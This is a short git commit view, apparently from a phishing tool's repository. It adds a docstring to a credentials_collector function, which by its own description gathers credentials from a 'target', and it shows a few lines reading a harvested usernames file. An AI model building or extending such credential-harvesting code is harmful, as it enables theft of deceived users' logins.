Added doc string for credentials_collector

This commit is contained in:
sTiKyt 2020-06-09 08:02:36 +03:00
parent 3fb8bb77ec
commit 04d98d28d6
No known key found for this signature in database
GPG Key ID: 510E1C3C9B2414B4

View File

@ -103,8 +103,8 @@ def module_loading_message(): # This one just show text..
print(localization.lang_module_loading_message["select_any_mode"])
def credentials_collector(port):
def credentials_collector():
"""Collects, writes and returns credentials and additional info gathered from target."""
print(localization.lang_credentials_collector["waiting_for_interaction"])
while True:
with open('Server/www/usernames.txt') as creds: